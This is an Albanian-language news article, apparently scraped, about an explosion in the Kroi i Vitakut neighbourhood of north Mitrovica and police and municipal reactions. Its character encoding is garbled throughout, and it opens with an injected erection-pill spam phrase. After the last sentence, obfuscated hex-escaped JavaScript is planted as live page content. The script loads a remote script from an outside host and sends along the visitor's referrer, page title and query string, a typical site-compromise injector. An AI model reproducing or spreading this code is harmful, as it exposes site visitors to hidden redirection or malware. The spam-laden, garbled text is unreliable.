serbi-shqip

Tensione te Kroi i Vitakut

mojo pills to get erections. E plotA�suar – Policia e KosovA� e ka konfirmuar lajmin pA�r shpA�rthimin te Kroi i Vitakut nA� veri tA� MitrovicA�s. Besim Hoti, zA�dhA�nA�s i policisA� pA�r rajonin e MitrovicA�s, tha se policia A�shtA� duke hetuar rastin pA�r tA� pA�rcaktuar llojin e shpA�rthimit

 

“Ne jemi ende nA� fazA�n e pA�rcaktimit tA� llojit tA� mjetit shpA�rthyes. FatmirA�sisht, nuk A�shtA� raportuar pA�r tA� lA�nduar, pasi qA� besohet se mjeti A�shtA� hedhur nA� fushA� tA� hapur nA� lagjen Kroi i Vitakuta�?, tha Hoti pA�r Rel.

Ai tha se shpA�rthimi, i cili ka ndodhur nA� afA�rsi tA� shtA�pive nA� kA�tA� lagje, ka ngritur tensione dhe shqetA�sim te banorA�t e lagjes.

Sipas zA�dhA�nA�sit Hoti, punA�torA�t qA� kanA� qenA� duke punuar nA� ndA�rtimin e shtA�pive, nuk dihet ende se a do tA� nisin punA�t sot, pA�r shkak tA� tensioneve.

a�?Do tA� bA�jmA� njA� vlerA�sim tA� tA�rA� situatA�s nA� mA�nyrA� qA� tA� shohim pA�r sA� afA�rmi nA�se ekzistojnA� kushtet qA� puna sot tA� vazhdojA� apo tA� suspendohet pA�rkohA�sisht; kjo mbetet tA� vlerA�sohet varA�sisht nga situata e krijuar nA� terrena�?, tha Hoti.

Kroi i Vitakut nA� veri tA� MitrovicA�s A�shtA� njA� nga lagjet e tjera tA� banuara me popullatA� tA� pA�rzier janA� pA�rshkuar kohA�t e fundit me incidente.

Nga ana tjetA�r, “pA�rkundA�r kA�rcA�nimeve dhe incidenteve qA� janA� duke krijuar strukturat paralele serbe nA� veri, rindA�rtimi i shtA�pive tA� djegura dhe tA� shkatA�rruara nA� luftA� nuk do tA� ndA�rpritet”.

KA�shtu ka deklaruar sot kryetari i KomunA�s sA� MitrovicA�s, Avni Kastrati, pas njA� takimi tA� jashtA�zakonshA�m tA� Komitetit tA� SigurisA�, tA� thirrur pas incidenteve tA� fundit nA� Kroin e Vitakut. /Telegrafi/

 

————————————-

Nazmi Ismaili, anA�tari i KA�shillit tA� Veriut, qA� mbledh pA�rfaqA�sues tA� lagjeve tA� banuara me popullatA� tA� pA�rzier nA� veri tA� MitrovicA�s, A�ka thA�nA� se para pak A�astesh nA� lagjen “Kroi i Vitakut” ka ndodhur njA� shpA�rthim i fuqishA�m pA�r tA� cilin sipas tij, nuk dihet se nga ka ardhur.

a�?Tash ishte njA� detonim, A�farA� ishte ne nuk mund ta dimA�, por ishte njA� shpA�rthima�?, tha Ismaili, transmeton Rel.

Sipas tij, aktualisht policia janA� nA� vendin e ngjarjes dhe janA� duke vA�zhguar situatA�n.

Lajmin pA�r kA�tA� shpA�rthim e ka konfirmuar edhe Policia e KosovA�s, por nuk ka dhA�nA� detaje tA� tjera.

a�?Kroi i Vitakuta�? nA� veri tA� MitrovicA�s dhe lagjet e tjera tA� banuara me popullatA� tA� pA�rzier janA� pA�rshkuar kohA�t e fundit me incidente.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}